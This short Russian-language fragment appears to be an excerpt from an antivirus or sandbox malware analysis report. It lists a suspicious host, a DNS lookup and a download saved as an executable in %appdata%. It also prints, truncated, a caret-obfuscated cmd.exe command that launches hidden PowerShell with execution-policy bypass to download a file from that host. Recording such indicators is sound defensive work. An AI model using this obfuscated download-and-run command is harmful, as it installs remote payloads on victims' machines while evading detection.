Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WerShel^l.E^xE ^-Exe^CUt^IoNPO^l^icY^ BY^pASS^ ^-no^proF^IlE -W^iNDOWsTYL^e ^HiDD^EN ^(nEw-O^bJeCT s^ysTe^M^.NE^T.wEBCliEN^t)^.d^OWnloADfile(^'http://zonexxopera.top/read.php?f=0....
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "Po^WerShel^l.E^xE ^-Exe^CUt^IoNPO^l^icY^ BY^pASS^ ^-no^proF^IlE -W^iNDOWsTYL^e ^HiDD^EN ^(nEw-O^bJeCT s^ysTe^M^.NE^T.wEBCliEN^t)^.d^OWnloADfile(^'http://zonexxopera.top/read.php?f=0....' (со скрытым окном)